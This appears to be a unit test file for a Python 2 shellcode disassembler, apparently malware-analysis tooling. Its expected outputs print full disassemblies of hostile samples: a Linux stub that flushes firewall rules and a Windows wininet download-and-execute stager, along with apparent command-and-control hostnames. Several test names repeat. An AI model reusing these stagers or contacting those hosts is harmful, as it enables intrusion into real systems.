def test_sd():
sc = Shellcode(open("tests/files/plain/sd.bin", "rb").read())
assert sc.to_dict()["bbl"] == [
(0x00, 0x0c),
(0x0c, 0x39),
(0x39, 0x45),
]
def test_bin1():
sc = Shellcode(open("tests/files/plain/1.bin", "rb").read())
assert sc.to_dict()["bbl"] == [
(0x00, 0x06),
(0x06, 0x15),
(0x15, 0x1e),
(0x1e, 0x23),
(0x23, 0x25),
(0x25, 0x2c),
(0x2c, 0x3a),
(0x3a, 0x45),
(0x45, 0x47),
(0x47, 0x4f),
(0x4f, 0x59),
(0x59, 0x61),
(0x61, 0x81),
(0x81, 0x82),
(0x82, 0x88),
(0x88, 0xb9),
(0xc0, 0xe1),
(0xe1, 0x105),
(0x105, 0x108),
(0x108, 0x10f),
(0x10f, 0x128),
(0x128, 0x13b),
(0x13b, 0x143),
(0x143, 0x145),
(0x145, 0x14b),
]
assert sc.to_dict()["data"] == [
(0xb9, "/282yG\x00"),
(0x14b, "www.service.chrome-up.date\x00"),
]
def test_bin3():
sc = Shellcode(open("tests/files/plain/3.bin", "rb").read())
assert sc.to_dict()["bbl"] == [
(0x00, 0x06),
(0x06, 0x15),
(0x15, 0x1e),
(0x1e, 0x23),
(0x23, 0x25),
(0x25, 0x2c),
(0x2c, 0x3a),
(0x3a, 0x45),
(0x45, 0x47),
(0x47, 0x4f),
(0x4f, 0x59),
(0x59, 0x61),
(0x61, 0x81),
(0x81, 0x82),
(0x82, 0x88),
(0x88, 0xb9),
(0xc0, 0xe1),
(0xe1, 0x105),
(0x105, 0x108),
(0x108, 0x10f),
(0x10f, 0x128),
(0x128, 0x13b),
(0x13b, 0x143),
(0x143, 0x145),
(0x145, 0x14b),
]
assert sc.to_dict()["data"] == [
(0xb9, "/BZFC7\x00"),
(0x14b, "spintoolmid.ddns.net\x00"),
]
def test_bin2():
sc = Shellcode(open("tests/files/plain/2.bin", "rb").read())
assert sc.to_dict()["bbl"] == [
(0x00, 0x06),
(0x06, 0x15),
(0x15, 0x1e),
(0x1e, 0x23),
(0x23, 0x25),
(0x25, 0x2c),
(0x2c, 0x3a),
(0x3a, 0x45),
(0x45, 0x47),
(0x47, 0x4f),
(0x4f, 0x59),
(0x59, 0x61),
(0x61, 0x81),
(0x81, 0x82),
(0x82, 0x88),
(0x88, 0xc0),
(0xd1, 0xe5),
(0xe5, 0xf4),
(0xf4, 0xf9),
(0xf9, 0x100),
(0x100, 0x122),
(0x122, 0x134),
(0x134, 0x135),
]
assert sc.to_dict()["data"] == [
(192, "ddos400.ddns.net\x00"),
]
def test_bin1():
sc = Shellcode(open("tests/files/plain/1.bin", "rb").read())
assert json.loads(sc.to_json()) == {
"bbl":
mock.ANY,
"text":
mock.ANY,
"data": [
[0xb9, "/282yG\x00"],
[0x14b, "www.service.chrome-up.date\x00"],
],
}
def test_parse():
sc = Shellcode("\x90\x75\x02\x90\x90\x90")
assert sc.to_dict() == {
"text": [
(0, 1, "nop", ""),
(1, 2, "jne", "5"),
(3, 1, "nop", ""),
(4, 1, "nop", ""),
(5, 1, "nop", ""),
],
"bbl": [
(0x00, 0x03),
(0x03, 0x05),
(0x05, 0x06),
],
"data": [],
}
def test_sd():
sc = Shellcode(open("tests/files/plain/sd.bin", "rb").read())
assert json.loads(sc.to_json()) == {
"bbl": [
[0, 12],
[12, 57],
[57, 69],
],
"text": [
[0, 2, "xor", "eax, eax"],
[2, 2, "xor", "ebx, ebx"],
[4, 2, "mov", "al, 2"],
[6, 2, "int", "0x80"],
[8, 2, "cmp", "eax, ebx"],
[10, 2, "jne", "0x39"],
[12, 2, "xor", "eax, eax"],
[14, 1, "push", "eax"],
[15, 4, "push", "0x462d"],
[19, 2, "mov", "esi, esp"],
[21, 1, "push", "eax"],
[22, 5, "push", "0x73656c62"],
[27, 5, "push", "0x61747069"],
[32, 5, "push", "0x2f6e6962"],
[37, 5, "push", "0x732f2f2f"],
[42, 2, "mov", "ebx, esp"],
[44, 4, "lea", "edx, dword ptr [esp + 0x10]"],
[48, 1, "push", "eax"],
[49, 1, "push", "esi"],
[50, 1, "push", "esp"],
[51, 2, "mov", "ecx, esp"],
[53, 2, "mov", "al, 0xb"],
[55, 2, "int", "0x80"],
[57, 2, "mov", "ebx, eax"],
[59, 2, "xor", "eax, eax"],
[61, 2, "xor", "ecx, ecx"],
[63, 2, "xor", "edx, edx"],
[65, 2, "mov", "al, 7"],
[67, 2, "int", "0x80"],
],
"data": [],
}
def as_text(payload):
ret, sc = [], Shellcode(payload).to_dict()
for start, end in sc["bbl"]:
ret.append((start, "bbl_0x%04x:" % start))
for addr, size, mnemonic, operands in sc["text"]:
ret.append((addr, " 0x%04x: %s %s" % (addr, mnemonic, operands)))
for off, data in sc["data"]:
ret.append((off, ".db %s" % str_as_db(data)))
# Sort each newline. Precedence is identified by the (offset, index) tuple
# where index indicates the index in the ret list, i.e., bbl has a higher
# priority than the instructions.
ret = sorted((off, idx, line) for idx, (off, line) in enumerate(ret))
return "%s\n" % "\n".join(line.rstrip() for off, idx, line in ret)
def test_add_bbl2():
sc = Shellcode("")
sc.parsed[209] = False
sc.parsed[249] = False
sc.parsed[256] = True
sc.parsed[290] = False
sc.add_bbl(209, 244)
sc.add_bbl(256, 308)
sc.add_bbl(249, 308)
sc.add_bbl(290, None)
sc.add_bbl(249, 308)
sc.add_bbl(290, None)
assert sc.bbl == {
209: 244,
249: 256,
256: 290,
290: 308,
}
def test_add_bbl1():
sc = Shellcode("")
sc.parsed[97] = False
sc.parsed[129] = False
sc.parsed[130] = False
sc.parsed[136] = False
sc.add_bbl(136, 192)
sc.add_bbl(130, 136)
sc.add_bbl(129, 136)
sc.add_bbl(97, 129)
assert sc.bbl == {
97: 129,
129: 130,
130: 136,
136: 192,
}
def parse(payload):
return Shellcode(payload).to_dict()
def main():
if len(sys.argv) != 2:
print "Usage: python %s <sc.bin>" % sys.argv[0]
exit(1)
print Shellcode(open(sys.argv[1], "rb").read()).to_json()
def test_bin2():
sc = Shellcode(open("tests/files/plain/1.bin", "rb").read())
assert json.loads(sc.to_json()) == {
"bbl":
mock.ANY,
"text": [
[0, 1, "cld", ""],
[1, 5, "call", "0x88"],
[6, 1, "pushal", ""],
[7, 2, "mov", "ebp, esp"],
[9, 2, "xor", "eax, eax"],
[11, 4, "mov", "edx, dword ptr fs:[eax + 0x30]"],
[15, 3, "mov", "edx, dword ptr [edx + 0xc]"],
[18, 3, "mov", "edx, dword ptr [edx + 0x14]"],
[21, 3, "mov", "esi, dword ptr [edx + 0x28]"],
[24, 4, "movzx", "ecx, word ptr [edx + 0x26]"],
[28, 2, "xor", "edi, edi"],
[30, 1, "lodsb", "al, byte ptr [esi]"],
[31, 2, "cmp", "al, 0x61"],
[33, 2, "jl", "0x25"],
[35, 2, "sub", "al, 0x20"],
[37, 3, "ror", "edi, 0xd"],
[40, 2, "add", "edi, eax"],
[42, 2, "loop", "0x1e"],
[44, 1, "push", "edx"],
[45, 1, "push", "edi"],
[46, 3, "mov", "edx, dword ptr [edx + 0x10]"],
[49, 3, "mov", "ecx, dword ptr [edx + 0x3c]"],
[52, 4, "mov", "ecx, dword ptr [ecx + edx + 0x78]"],
[56, 2, "jecxz", "0x82"],
[58, 2, "add", "ecx, edx"],
[60, 1, "push", "ecx"],
[61, 3, "mov", "ebx, dword ptr [ecx + 0x20]"],
[64, 2, "add", "ebx, edx"],
[66, 3, "mov", "ecx, dword ptr [ecx + 0x18]"],
[69, 2, "jecxz", "0x81"],
[71, 1, "dec", "ecx"],
[72, 3, "mov", "esi, dword ptr [ebx + ecx*4]"],
[75, 2, "add", "esi, edx"],
[77, 2, "xor", "edi, edi"],
[79, 1, "lodsb", "al, byte ptr [esi]"],
[80, 3, "ror", "edi, 0xd"],
[83, 2, "add", "edi, eax"],
[85, 2, "cmp", "al, ah"],
[87, 2, "jne", "0x4f"],
[89, 3, "add", "edi, dword ptr [ebp - 8]"],
[92, 3, "cmp", "edi, dword ptr [ebp + 0x24]"],
[95, 2, "jne", "0x45"],
[97, 1, "pop", "eax"],
[98, 3, "mov", "ebx, dword ptr [eax + 0x24]"],
[101, 2, "add", "ebx, edx"],
[103, 4, "mov", "cx, word ptr [ebx + ecx*2]"],
[107, 3, "mov", "ebx, dword ptr [eax + 0x1c]"],
[110, 2, "add", "ebx, edx"],
[112, 3, "mov", "eax, dword ptr [ebx + ecx*4]"],
[115, 2, "add", "eax, edx"],
[117, 4, "mov", "dword ptr [esp + 0x24], eax"],
[121, 1, "pop", "ebx"],
[122, 1, "pop", "ebx"],
[123, 1, "popal", ""],
[124, 1, "pop", "ecx"],
[125, 1, "pop", "edx"],
[126, 1, "push", "ecx"],
[127, 2, "jmp", "eax"],
[129, 1, "pop", "edi"],
[130, 1, "pop", "edi"],
[131, 1, "pop", "edx"],
[132, 2, "mov", "edx, dword ptr [edx]"],
[134, 2, "jmp", "0x15"],
[136, 1, "pop", "ebp"],
[137, 5, "push", "0x74656e"],
[142, 5, "push", "0x696e6977"],
[147, 1, "push", "esp"],
[148, 5, "push", "0x726774c"],
[153, 2, "call", "ebp"],
[155, 2, "xor", "ebx, ebx"],
[157, 1, "push", "ebx"],
[158, 1, "push", "ebx"],
[159, 1, "push", "ebx"],
[160, 1, "push", "ebx"],
[161, 1, "push", "ebx"],
[162, 5, "push", "0xa779563a"],
[167, 2, "call", "ebp"],
[169, 1, "push", "ebx"],
[170, 1, "push", "ebx"],
[171, 2, "push", "3"],
[173, 1, "push", "ebx"],
[174, 1, "push", "ebx"],
[175, 5, "push", "0x1cec"],
[180, 5, "call", "0x145"],
[192, 1, "push", "eax"],
[193, 5, "push", "0xc69f8957"],
[198, 2, "call", "ebp"],
[200, 2, "mov", "esi, eax"],
[202, 1, "push", "ebx"],
[203, 5, "push", "0x84e03200"],
[208, 1, "push", "ebx"],
[209, 1, "push", "ebx"],
[210, 1, "push", "ebx"],
[211, 1, "push", "edi"],
[212, 1, "push", "ebx"],
[213, 1, "push", "esi"],
[214, 5, "push", "0x3b2e55eb"],
[219, 2, "call", "ebp"],
[221, 1, "xchg", "eax, esi"],
[222, 2, "push", "0xa"],
[224, 1, "pop", "edi"],
[225, 5, "push", "0x3380"],
[230, 2, "mov", "eax, esp"],
[232, 2, "push", "4"],
[234, 1, "push", "eax"],
[235, 2, "push", "0x1f"],
[237, 1, "push", "esi"],
[238, 5, "push", "0x869e4675"],
[243, 2, "call", "ebp"],
[245, 1, "push", "ebx"],
[246, 1, "push", "ebx"],
[247, 1, "push", "ebx"],
[248, 1, "push", "ebx"],
[249, 1, "push", "esi"],
[250, 5, "push", "0x7b18062d"],
[255, 2, "call", "ebp"],
[257, 2, "test", "eax, eax"],
[259, 2, "jne", "0x10f"],
[261, 1, "dec", "edi"],
[262, 2, "jne", "0xe1"],
[264, 5, "push", "0x56a2b5f0"],
[269, 2, "call", "ebp"],
[271, 2, "push", "0x40"],
[273, 5, "push", "0x1000"],
[278, 5, "push", "0x400000"],
[283, 1, "push", "ebx"],
[284, 5, "push", "0xe553a458"],
[289, 2, "call", "ebp"],
[291, 1, "xchg", "eax, ebx"],
[292, 1, "push", "ebx"],
[293, 1, "push", "ebx"],
[294, 2, "mov", "edi, esp"],
[296, 1, "push", "edi"],
[297, 5, "push", "0x2000"],
[302, 1, "push", "ebx"],
[303, 1, "push", "esi"],
[304, 5, "push", "0xe2899612"],
[309, 2, "call", "ebp"],
[311, 2, "test", "eax, eax"],
[313, 2, "je", "0x108"],
[315, 2, "mov", "eax, dword ptr [edi]"],
[317, 2, "add", "ebx, eax"],
[319, 2, "test", "eax, eax"],
[321, 2, "jne", "0x128"],
[323, 1, "pop", "eax"],
[324, 1, "ret", ""],
[325, 1, "pop", "edi"],
[326, 5, "call", "0xc0"],
],
"data":
mock.ANY,
}
